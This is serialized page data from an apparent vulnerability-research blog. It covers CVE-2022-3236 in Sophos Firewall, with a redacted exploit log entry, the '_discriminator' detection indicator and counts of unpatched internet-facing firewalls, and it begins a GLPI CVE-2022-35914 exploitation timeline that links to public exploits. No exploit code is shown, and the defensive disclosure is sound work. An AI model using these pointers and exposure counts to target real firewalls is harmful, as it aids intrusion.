",[47,111613,111616],{"href":111614,"rel":111615},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-3236",[51],"CVE-2022-3236"," – an unauthenticated and remote code execution vulnerability affecting the Sophos Firewall Webadmin and User Portal HTTP interfaces – with an automated hotfix sent out in September 2022. Through its ",[47,111619,5359],{"href":111620,"rel":111621},"https:\u002F\u002Fwww.sophos.com\u002Fen-us\u002Fsecurity-advisories\u002Fsophos-sa-20220923-sfos-rce",[51]," published on September 23, 2022, it also alerted users who don't receive automatic hotfixes to apply the update themselves. The advisory stated the vulnerability had previously been used against \"a small set of specific organizations, primarily in the South Asia region.\" In December, Sophos released ",[47,111624,111627],{"href":111625,"rel":111626},"https:\u002F\u002Fwww.sophos.com\u002Fen-us\u002Fsecurity-advisories\u002Fsophos-sa-20221201-sfos-19-5-0",[51],"v19.5 GA"," GA with an official fix.",[263,111630],{":list":111631,"ico":266,"title":83529},"[\"As there are no public proof-of-concept exploits for CVE-2022-3236, we created our own to determine its potential for mass exploitation.\",\"We scanned internet-facing Sophos Firewalls and found more than 4,000 firewalls that were too old to receive a hotfix.\",\"We encourage Sophos Firewall administrators to look through their logs to determine if they see indications of exploit attempts. Two files to focus on include `\u002Flogs\u002Fcsc.log` and `\u002Flog\u002FvalidationError.log`.\",\"Internet-facing firewalls appear to largely be eligible for hotfixes and the default authentication captcha likely prevented mass exploitation.\"]",[1920,111633,111635],{"id":111634},"few-public-details","Few Public Details",[18,111637,111638,111639,982,111643,111648,111649,111654],{},"CVE-2022-3236 was quickly added to the CISA ",[47,111640,111642],{"href":2864,"rel":111641},[51],"Known Exploited Vulnerabilities Catalog",[47,111644,111647],{"href":111645,"rel":111646},"https:\u002F\u002Fwww.zerodayinitiative.com\u002Fblog\u002F2022\u002F10\u002F19\u002Fcve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection",[51],"Zero Day Initiative"," (ZDI) published a high-level description of the issue in October, but public information has otherwise been non-existent. Self-described “proof of concept” exploits have been published to GitHub, but they were quickly deleted, likely due to their scamming nature. ",[47,111650,111653],{"href":111651,"rel":111652},"https:\u002F\u002Fsploitus.com\u002F?query=CVE-2022-3236#exploits",[51],"Sploitus"," has cached a number of these repositories.",[18,111656,111657],{},[68,111658],{":width":10862,"alt":111659,"src":111660},"sploitus","\u002Fblog\u002Fsophos-cve-2022-3236\u002Fsploitus.png",[18,111662,111663,111664,111667,111668,59],{},"As the image shows above, the repository is soliciting payment via ",[886,111665,111666],{},"satoshidisk.com"," for a promised exploit and targeting information. This is a common scam that leaves many buyers ",[47,111669,111672],{"href":111670,"rel":111671},"https:\u002F\u002Fsatoshidisk.com\u002Fpay\u002FCGXTIL",[51],"unsatisfied",[18,111674,111675],{},[68,111676],{":width":10862,"alt":111677,"src":111678},"Bad Review","\u002Fblog\u002Fsophos-cve-2022-3236\u002F1star.png",[18,111680,111681],{},"At the time of writing, there appears to be no public proof of concept exploits. However, the ZDI article gives sufficient information to quickly reproduce the issue (as we have), so it’s only a matter of time before something is made public.",[1920,111683,111685],{"id":111684},"sophos-firewall-in-the-wild","Sophos Firewall in the Wild",[18,111687,111688,111689,111694,111695,111700],{},"The scam repositories aren’t surprising given the popularity of Sophos Firewall. Using Shodan, we can identify ",[47,111690,111693],{"href":111691,"rel":111692},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22Sophos%22+html%3A%22Without+JavaScript+support+user+portal+will+not+work.%22",[51],"~78,0000"," User Portal and ",[47,111696,111699],{"href":111697,"rel":111698},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22Sophos%22+html%3A%22Without+JavaScript+support+web+console+will+not+work.%22",[51],"~10,000"," WebAdmin interfaces.",[18,111702,111703],{},[68,111704],{":width":10862,"alt":111705,"src":111706},"shodan","\u002Fblog\u002Fsophos-cve-2022-3236\u002Fshodan.png",[18,111708,111709,111710,111715],{},"Since we wrote our own exploit for CVE-2022-3236 (and ",[47,111711,111714],{"href":111712,"rel":111713},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-1040",[51],"CVE-2022-1040","), we were curious how many internet-facing Sophos Firewalls might still be vulnerable. We performed a version scan of the servers we identified on Shodan, and found the following results (some low volume hotfixed versions excluded from the graphs due to size):",[1925,111717,111718],{},[18,111719,111720],{},"Sophos Firewalls Using Fixed Versions",[11128,111722],{":labels":111723,":values":111724},"[\"18.5.5.509\",\"19.5.0.197\",\"19.0.2\"]","[117,57,0]",[1925,111726,111727],{},[18,111728,111729],{},"Sophos Firewalls Using Versions with a Hotfix Available",[11128,111731],{":labels":111732,":values":111733},"[\"18.5.4.418\",\"18.5.2.380\",\"18.5.3.408\",\"18.5.1.326\",\"18.0.5.586\",\"18.0.4.506\",\"17.5.12.664\",\"17.5.15.746\",\"18.0.6.655\",\"17.5.14.714\",\"17.5.17.837\",\"17.5.16.830\",\"19.0.1.365\",\"18.5.0.264\",\"18.0.3.457\",\"17.5.13.692\"]","[11619,10466,9060,6699,4045,3300,2849,2866,2425,1998,1713,1712,1141,992,955,843]",[1925,111735,111736],{},[18,111737,111738],{},"Sophos Firewalls Using Vulnerable Versions",[11128,111740],{":labels":111741,":values":111742},"[\"17.5.11.661\",\"17.5.9.577\",\"17.5.8.539\",\"17.5.10.620\",\"18.0.1.396\",\"17.5.7.511\",\"17.5.5.433\",\"17.5.6.488\",\"17.5.4.429\",\"18.0.2.403\",\"18.0.0.379\",\"18.0.0.354\",\"18.0.0.339\",\"18.0.1.367\",\"17.1.4.254\",\"18.0.0.321\",\"18.0.0.285\",\"18.0.0.180\",\"17.5.4.409\"]","[991,883,706,591,512,255,226,118,76,68,13,11,4,3,3,1,1,1,1]",[18,111744,111745],{},"More than 99% of internet-facing Sophos Firewalls haven't upgraded to versions containing the official fix for CVE-2022-3236. But around 93% are running versions that are eligible for a hotfix, and the default behavior for the firewall is to automatically download and apply hotfixes (unless disabled by an administrator). It’s likely that almost all servers eligible for a hotfix received one, although mistakes do happen. That still leaves more than 4,000 firewalls (or about 6% of internet-facing Sophos Firewalls) running versions that didn’t receive a hotfix and are therefore vulnerable.",[1920,111747,10612],{"id":10611},[18,111749,111750,111751,59],{},"There are firewalls that remain vulnerable to CVE-2022-3236, and the vulnerability was exploited as a 0-day for a period of time. After developing our exploit, we looked for high-quality indicators of compromise. We believe two log files have good indicators of exploitation attempts. The first file is ",[886,111752,111753],{},"\u002Flogs\u002Fcsc.log",[18,111755,111756],{},"Our exploit generates the following partially redacted log entry:",[1354,111758,111760],{"className":22307,"code":111759,"language":22309,"meta":219,"style":219},"MESSAGE Jan 06 12:42:45Z [worker:15566]: {\n \"request\": {\n \"method\": \"opcode\",\n \"name\": \"myaccount_login\",\n \"version\": \"1.6\",\n \"type\": \"json\",\n \"length\": 441,\n \"data\": {\n \"value\": REDACTED,\n \"APIVersion\": \"1805.2\",\n \"transactionid\": \"73\",\n \"___serverport\": 443,\n \"___serverip\": \"10.12.70.202\",\n \"___component\": \"GUI\",\n \"_discriminator\": REDACTED,\n \"captcha\": \"d376b3\",\n \"username\": \"txPGiKDy\",\n \"mode\": 451,\n \"currentlyloggedinuserip\": \"10.12.70.252\",\n \"___serverprotocol\": \"HTTP\",\n \"password\": \"****\"\n }\n }\n}\n",[886,111761,111762,111798,111810,111829,111848,111867,111885,111900,111912,111927,111947,111967,111982,112002,112022,112037,112056,112075,112091,112111,112130,112147,112151,112155],{"__ignoreMap":219},[1373,111763,111764,111767,111770,111772,111774,111776,111778,111781,111784,111786,111789,111792,111794,111796],{"class":1375,"line":1376},[1373,111765,111766],{"class":4640},"MESSAGE Jan ",[1373,111768,111769],{"class":5467},"06",[1373,111771,52062],{"class":5467},[1373,111773,4606],{"class":4640},[1373,111775,107445],{"class":5467},[1373,111777,4606],{"class":4640},[1373,111779,111780],{"class":5467},"45",[1373,111782,111783],{"class":4640},"Z ",[1373,111785,7035],{"class":1383},[1373,111787,111788],{"class":28571},"worker:",[1373,111790,111791],{"class":5467},"15566",[1373,111793,15050],{"class":1383},[1373,111795,20051],{"class":4640},[1373,111797,8904],{"class":1383},[1373,111799,111800,111802,111804,111806,111808],{"class":1375,"line":220},[1373,111801,23732],{"class":9152},[1373,111803,75186],{"class":9155},[1373,111805,183],{"class":9152},[1373,111807,4606],{"class":1383},[1373,111809,4765],{"class":1383},[1373,111811,111812,111814,111816,111818,111820,111822,111825,111827],{"class":1375,"line":1266},[1373,111813,19050],{"class":9152},[1373,111815,49218],{"class":9165},[1373,111817,183],{"class":9152},[1373,111819,4606],{"class":1383},[1373,111821,4883],{"class":9173},[1373,111823,111824],{"class":9176},"opcode",[1373,111826,183],{"class":9173},[1373,111828,9062],{"class":1383},[1373,111830,111831,111833,111835,111837,111839,111841,111844,111846],{"class":1375,"line":1852},[1373,111832,19050],{"class":9152},[1373,111834,30774],{"class":9165},[1373,111836,183],{"class":9152},[1373,111838,4606],{"class":1383},[1373,111840,4883],{"class":9173},[1373,111842,111843],{"class":9176},"myaccount_login",[1373,111845,183],{"class":9173},[1373,111847,9062],{"class":1383},[1373,111849,111850,111852,111854,111856,111858,111860,111863,111865],{"class":1375,"line":4692},[1373,111851,19050],{"class":9152},[1373,111853,78520],{"class":9165},[1373,111855,183],{"class":9152},[1373,111857,4606],{"class":1383},[1373,111859,4883],{"class":9173},[1373,111861,111862],{"class":9176},"1.6",[1373,111864,183],{"class":9173},[1373,111866,9062],{"class":1383},[1373,111868,111869,111871,111873,111875,111877,111879,111881,111883],{"class":1375,"line":4724},[1373,111870,19050],{"class":9152},[1373,111872,26399],{"class":9165},[1373,111874,183],{"class":9152},[1373,111876,4606],{"class":1383},[1373,111878,4883],{"class":9173},[1373,111880,22309],{"class":9176},[1373,111882,183],{"class":9173},[1373,111884,9062],{"class":1383},[1373,111886,111887,111889,111891,111893,111895,111898],{"class":1375,"line":4756},[1373,111888,19050],{"class":9152},[1373,111890,27440],{"class":9165},[1373,111892,183],{"class":9152},[1373,111894,4606],{"class":1383},[1373,111896,111897],{"class":5467}," 441",[1373,111899,9062],{"class":1383},[1373,111901,111902,111904,111906,111908,111910],{"class":1375,"line":4768},[1373,111903,19050],{"class":9152},[1373,111905,9156],{"class":9165},[1373,111907,183],{"class":9152},[1373,111909,4606],{"class":1383},[1373,111911,4765],{"class":1383},[1373,111913,111914,111916,111918,111920,111922,111925],{"class":1375,"line":4792},[1373,111915,26357],{"class":9152},[1373,111917,85021],{"class":86922},[1373,111919,183],{"class":9152},[1373,111921,4606],{"class":1383},[1373,111923,111924],{"class":28571}," REDACTED",[1373,111926,9062],{"class":1383},[1373,111928,111929,111931,111934,111936,111938,111940,111943,111945],{"class":1375,"line":4798},[1373,111930,26357],{"class":9152},[1373,111932,111933],{"class":86922},"APIVersion",[1373,111935,183],{"class":9152},[1373,111937,4606],{"class":1383},[1373,111939,4883],{"class":9173},[1373,111941,111942],{"class":9176},"1805.2",[1373,111944,183],{"class":9173},[1373,111946,9062],{"class":1383},[1373,111948,111949,111951,111954,111956,111958,111960,111963,111965],{"class":1375,"line":4806},[1373,111950,26357],{"class":9152},[1373,111952,111953],{"class":86922},"transactionid",[1373,111955,183],{"class":9152},[1373,111957,4606],{"class":1383},[1373,111959,4883],{"class":9173},[1373,111961,111962],{"class":9176},"73",[1373,111964,183],{"class":9173},[1373,111966,9062],{"class":1383},[1373,111968,111969,111971,111974,111976,111978,111980],{"class":1375,"line":4817},[1373,111970,26357],{"class":9152},[1373,111972,111973],{"class":86922},"___serverport",[1373,111975,183],{"class":9152},[1373,111977,4606],{"class":1383},[1373,111979,26551],{"class":5467},[1373,111981,9062],{"class":1383},[1373,111983,111984,111986,111989,111991,111993,111995,111998,112000],{"class":1375,"line":4825},[1373,111985,26357],{"class":9152},[1373,111987,111988],{"class":86922},"___serverip",[1373,111990,183],{"class":9152},[1373,111992,4606],{"class":1383},[1373,111994,4883],{"class":9173},[1373,111996,111997],{"class":9176},"10.12.70.202",[1373,111999,183],{"class":9173},[1373,112001,9062],{"class":1383},[1373,112003,112004,112006,112009,112011,112013,112015,112018,112020],{"class":1375,"line":4835},[1373,112005,26357],{"class":9152},[1373,112007,112008],{"class":86922},"___component",[1373,112010,183],{"class":9152},[1373,112012,4606],{"class":1383},[1373,112014,4883],{"class":9173},[1373,112016,112017],{"class":9176},"GUI",[1373,112019,183],{"class":9173},[1373,112021,9062],{"class":1383},[1373,112023,112024,112026,112029,112031,112033,112035],{"class":1375,"line":4843},[1373,112025,26357],{"class":9152},[1373,112027,112028],{"class":86922},"_discriminator",[1373,112030,183],{"class":9152},[1373,112032,4606],{"class":1383},[1373,112034,111924],{"class":28571},[1373,112036,9062],{"class":1383},[1373,112038,112039,112041,112043,112045,112047,112049,112052,112054],{"class":1375,"line":4849},[1373,112040,26357],{"class":9152},[1373,112042,104608],{"class":86922},[1373,112044,183],{"class":9152},[1373,112046,4606],{"class":1383},[1373,112048,4883],{"class":9173},[1373,112050,112051],{"class":9176},"d376b3",[1373,112053,183],{"class":9173},[1373,112055,9062],{"class":1383},[1373,112057,112058,112060,112062,112064,112066,112068,112071,112073],{"class":1375,"line":4877},[1373,112059,26357],{"class":9152},[1373,112061,4870],{"class":86922},[1373,112063,183],{"class":9152},[1373,112065,4606],{"class":1383},[1373,112067,4883],{"class":9173},[1373,112069,112070],{"class":9176},"txPGiKDy",[1373,112072,183],{"class":9173},[1373,112074,9062],{"class":1383},[1373,112076,112077,112079,112082,112084,112086,112089],{"class":1375,"line":4915},[1373,112078,26357],{"class":9152},[1373,112080,112081],{"class":86922},"mode",[1373,112083,183],{"class":9152},[1373,112085,4606],{"class":1383},[1373,112087,112088],{"class":5467}," 451",[1373,112090,9062],{"class":1383},[1373,112092,112093,112095,112098,112100,112102,112104,112107,112109],{"class":1375,"line":4931},[1373,112094,26357],{"class":9152},[1373,112096,112097],{"class":86922},"currentlyloggedinuserip",[1373,112099,183],{"class":9152},[1373,112101,4606],{"class":1383},[1373,112103,4883],{"class":9173},[1373,112105,112106],{"class":9176},"10.12.70.252",[1373,112108,183],{"class":9173},[1373,112110,9062],{"class":1383},[1373,112112,112113,112115,112118,112120,112122,112124,112126,112128],{"class":1375,"line":4947},[1373,112114,26357],{"class":9152},[1373,112116,112117],{"class":86922},"___serverprotocol",[1373,112119,183],{"class":9152},[1373,112121,4606],{"class":1383},[1373,112123,4883],{"class":9173},[1373,112125,6290],{"class":9176},[1373,112127,183],{"class":9173},[1373,112129,9062],{"class":1383},[1373,112131,112132,112134,112136,112138,112140,112142,112145],{"class":1375,"line":4952},[1373,112133,26357],{"class":9152},[1373,112135,86310],{"class":86922},[1373,112137,183],{"class":9152},[1373,112139,4606],{"class":1383},[1373,112141,4883],{"class":9173},[1373,112143,112144],{"class":9176},"****",[1373,112146,19057],{"class":9173},[1373,112148,112149],{"class":1375,"line":6776},[1373,112150,4795],{"class":1383},[1373,112152,112153],{"class":1375,"line":6781},[1373,112154,27147],{"class":1383},[1373,112156,112157],{"class":1375,"line":7524},[1373,112158,1855],{"class":1383},[18,112160,112161,112162,112164,112165,112168],{},"The presence of the ",[886,112163,112028],{}," field in a login request is sufficient to detect an exploit attempt. The other log, ",[886,112166,112167],{},"\u002Flog\u002FvalidationError.log",", has a similar, but much more verbose indicator.",[1354,112170,112173],{"className":112171,"code":112172,"language":1359},[1357],"********** Entity json validation log:6-1-2023 7:42:33 Objectname=login::login\n\n => Validation start for: password\n\n - Validating type : SCALAR,STRING\n\n - Validating 'datatype' : Result=true\n\n - Validating 'require' : Result=true\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: mode\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: value\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: APIVersion\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: captcha\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: ___serverip\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: currentlyloggedinuserip\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: username\n\n - Validating type : SCALAR,STRING\n\n - Validating 'datatype' : Result=true\n\n - Validating 'require' : Result=true\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: ___serverprotocol\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: transactionid\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: ___serverport\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: _discriminator\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n\n => Validation start for: ___component\n\n - Validating 'validateValidAndInvalidInput' for type SCALAR\n",[886,112174,112172],{"__ignoreMap":219},[18,112176,112177,112178,112180],{},"Again, note the presence of the ",[886,112179,112028],{}," field within a login request. We encourage Sophos Firewall administrators to look through their logs to determine if they see these indications of an exploit attempt.",[1920,112182,112184],{"id":112183},"limitations-of-exploitation","Limitations of Exploitation",[18,112186,112187],{},"While CVE-2022-3236 does allow an attacker to inject and execute arbitrary Perl, there is a limitation to mass exploitation. By default, Sophos Firewall requires web clients to solve a captcha during authentication.",[18,112189,112190],{},[68,112191],{":width":10862,"alt":104608,"src":112192},"\u002Fblog\u002Fsophos-cve-2022-3236\u002Fcaptcha.png",[18,112194,112195],{},"The vulnerable code is only reached after the captcha is validated. A failed captcha will result in the exploit failing. While not impossible, programmatically solving captchas is a high hurdle for most attackers. Most internet-facing Sophos Firewalls appear to have the login captcha enabled, which means, even at the most opportune times, this vulnerability was unlikely to have been successfully exploited at scale.",[1920,112197,1903],{"id":1902},[18,112199,112200],{},"CVE-2022-3236 is one of those rare vulnerabilities that has been exploited in the wild with few details ever made public. Having developed an exploit ourselves, we can say this vulnerability was likely never as scary as it sounded thanks to the swift work of Sophos and good default security settings on the firewall itself. Internet-facing firewalls appear to largely be eligible for hotfixes and the default authentication captcha likely prevented mass exploitation.",[18,112202,95204,112203,95208],{},[47,112204,78319],{"href":78319,"rel":112205},[51],[2901,112207,112208],{},"html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .s4fT8, html code.shiki .s4fT8{--shiki-light:#90A4AE;--shiki-light-font-style:inherit;--shiki-default:#B31D28;--shiki-default-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic;--shiki-sepia:#F44747;--shiki-sepia-font-style:inherit}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sTC9v, html code.shiki .sTC9v{--shiki-light:#F76D47;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":112210},[],"2023-01-13","Sophos Firewalls were exploited using CVE-2022-3236 in September, 2022. Few details have been published about this vulnerability. In this blog, we look at log entries the exploit creates and determine how many vulnerable internet-facing firewalls still exist.",{"slug":112214},"sophos-cve-2022-3236","\u002Fblog\u002Fsophos-cve-2022-3236",{"title":111566,"description":112212},"blog\u002Fsophos-cve-2022-3236",[242],"ZWny5acEL-L25OF4J2EjEuFSFwYDmv4s806zlQF0kac",{"id":112221,"title":112222,"articles":112223,"authors":112229,"body":112231,"date":112555,"description":112556,"extension":234,"image":7,"link":7,"meta":112557,"navigation":237,"path":112559,"seo":112560,"series":7,"stem":112561,"subtype":7,"tags":112562,"__hash__":112563},"blog\u002Fblog\u002Fglpi-exploitation.md","GLPI Exploitation Timeline",[112224,112228],{"title":112225,"source":14382,"link":112226,"date":112227},"CISA's KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems","https:\u002F\u002Fthehackernews.com\u002F2023\u002F03\u002Fcisas-kev-catalog-updated-with-3-new.html","2023-03-08",{"title":112225,"source":14382,"link":112226,"date":106091},[112230],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":112232,"toc":112553},[112233,112235,112249,112254,112258,112299,112308,112313,112317,112324,112330,112333,112337,112344,112347,112350,112353,112360,112462,112465,112468,112476,112482,112499,112505,112521,112526,112530,112539,112541,112544,112550],[1920,112234,11648],{"id":11647},[18,112236,36764,112237,112240,112241,112245,112246],{},[47,112238,42306],{"href":214,"rel":112239},[51]," service, VulnCheck tracks vulnerabilities exploited in the wild. ",[47,112242,112244],{"href":107333,"rel":112243},[51],"Prioritizing"," known exploited vulnerabilities for remediation is a smart strategy to minimize vulnerability risk. However, that strategy breaks down when some exploited vulnerabilities are overlooked. Consider the growing gap between vulnerabilities VulnCheck tracks as exploited in the wild and the ",[47,112247,100825],{"href":2864,"rel":112248},[51],[1925,112250,112251],{},[18,112252,112253],{},"Exploited in the Wild Vulnerabilities Published in 2022",[11128,112255],{":labels":112256,":values":112257},"[\"VulnCheck\",\"CISA KEV Catalog\"]","[135,98]",[18,112259,112260,112261,112264,112265,112270,112271,112276,112277,1246,112282,1255,112287,112292,112293,112298],{},"For CVE published in 2022, VulnCheck is tracking 37 more exploited vulnerabilities than the CISA KEV Catalog. One vulnerability that we’re tracking and KEV isn’t is ",[47,112262,106263],{"href":107165,"rel":112263},[51],", a trivial unauthenticated and remote command execution vulnerability affecting ",[47,112266,112269],{"href":112267,"rel":112268},"https:\u002F\u002Fglpi-project.org\u002F",[51],"GLPI",". GLPI is ",[47,112272,112275],{"href":112273,"rel":112274},"https:\u002F\u002Fgithub.com\u002Fglpi-project\u002Fglpi",[51],"open source"," software that can serve as a helpdesk, asset manager, administrator, and more. Their website displays logos of well-known customers such as ",[47,112278,112281],{"href":112279,"rel":112280},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FAirbus",[51],"Airbus",[47,112283,112286],{"href":112284,"rel":112285},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FLa_Poste_(France)",[51],"La Poste",[47,112288,112291],{"href":112289,"rel":112290},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FBeIN_Sports",[51],"beIN Sports",". The website further describes ",[47,112294,112297],{"href":112295,"rel":112296},"https:\u002F\u002Fglpi-project.org\u002Fcategory\u002Fsuccess-cases\u002F",[51],"success cases"," where customers have deployed the software in business critical roles.",[18,112300,112301,112302,112307],{},"Exposing critical IT management software to the internet is a mistake the security industry sees often. Censys can find approximately ",[47,112303,112306],{"href":112304,"rel":112305},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.http.response.body%3A%22_glpi_csrf_token%22",[51],"15,000"," internet-facing GLPI instances.",[1925,112309,112310],{},[18,112311,112312],{},"Top 10 Countries with Internet-Facing Non-Virtualized GLPI Instances",[11128,112314],{":labels":112315,":values":112316},"[\"Brazil\",\"France\",\"United States\",\"Russia\",\"Germany\",\"Colombia\",\"Spain\",\"Canada\",\"Argentina\",\"Italy\"]","[1100,771,606,195,148,146,108,73,65,63]",[18,112318,112319,112323],{},[47,112320,41731],{"href":112321,"rel":112322},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22_glpi_csrf_token%22",[51]," doesn’t see half as many instances as Censys, but it is able to create an interesting historical graph of internet-facing GLPI services.",[18,112325,112326],{},[68,112327],{":width":10862,"alt":112328,"src":112329},"shodan-timeline","\u002Fblog\u002Fglpi-exploitation\u002Fglpi-historical.png",[18,112331,112332],{},"Since September 2022, Shodan has seen a steep drop off of GLPI. We believe the reason for this drop off can be explained using the exploitation timeline for CVE-2022-35914.",[1920,112334,112336],{"id":112335},"cve-2022-35914-vulnerability-timeline","CVE-2022-35914 Vulnerability Timeline",[18,112338,112339,112340,4606],{},"Using VulnCheck’s Exploit Intelligence API, we’ve compiled the following timeline for ",[47,112341,106263],{"href":112342,"rel":112343},"https:\u002F\u002Fapi.vulncheck.com\u002Fv2\u002Fexploits\u002Fcve\u002FCVE-2022-35914",[51],[61025,112345],{":entries":112346},"[{\"date\":\"September 14, 2022\",\"markdown\":\"GLPI [announces](https:\u002F\u002Fglpi-project.org\u002Fnew-glpi-version-10-0-3\u002F) the release of version 10.3 and a fix for a “command injection” assigned CVE-2022-35914.\"},{\"date\":\"September 19, 2022\",\"markdown\":\"CVE-2022-35914 is published to [NVD](https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-35914).\"},{\"date\":\"September 30, 2022\",\"markdown\":\"The first public [proof of concept exploit](https:\u002F\u002Fgithub.com\u002Fcosad3s\u002FCVE-2022-35914-poc) is posted to GitHub.\"},{\"date\":\"October 2, 2022\",\"markdown\":\"A [full disclosure blog](https:\u002F\u002Fmayfly277.github.io\u002Fposts\u002FGLPI-htmlawed-CVE-2022-35914\u002F) is published.\"},{\"date\":\"October 3, 2022\",\"markdown\":\"A [tweet](https:\u002F\u002Ftwitter.com\u002FM4yFly\u002Fstatus\u002F1576875657732435968) containing a proof of concept exploit is posted.\"},{\"date\":\"October 5, 2022\",\"markdown\":\"GLPI publishes an [important message](https:\u002F\u002Fglpi-project.org\u002Fsecurity-update-10-0-3-and-9-5-9\u002F), stating CVE-2022-35914 has been exploited “massively.”\"},{\"date\":\"October 13, 2022\",\"markdown\":\"Shadowserver [tweets](https:\u002F\u002Ftwitter.com\u002FShadowserver\u002Fstatus\u002F1580475994590220288) that they’re seeing exploitation attempts on their honeypots.\"},{\"date\":\"October 19, 2022\",\"markdown\":\"A [pull request](https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fpull\u002F17162) is created for a CVE-2022-35914 Metasploit module.\"},{\"date\":\"October 25, 2022\",\"markdown\":\"The Metasploit module is merged into the master branch and archived on [packet storm](https:\u002F\u002Fpacketstormsecurity.com\u002Ffiles\u002F169501\u002FGLPI-10.0.2-Command-Injection.html).\"},{\"date\":\"November 6, 2022\",\"markdown\":\"A curl-based one-line [proof of concept](https:\u002F\u002Fgithub.com\u002F0xGabe\u002FCVE-2022-35914) is posted to GitHub.\"},{\"date\":\"December 12, 2022\",\"markdown\":\"A “mass” scanner is advertised for sale on [Twitter](https:\u002F\u002Ftwitter.com\u002Fxstro0\u002Fstatus\u002F1603154229962878976).\"}]",[18,112348,112349],{},"There is a lot going on here, but there are a few parts that are specifically worth calling out. First, there is a critical five day gap between GLPI announcing the security patch and the CVE being published to NVD. For better or worse, vulnerabilities often don’t “exist” in the security industry until they’ve been published by MITRE and NVD. That’s five days where this vulnerability was known to the world, but much of the security industry remained 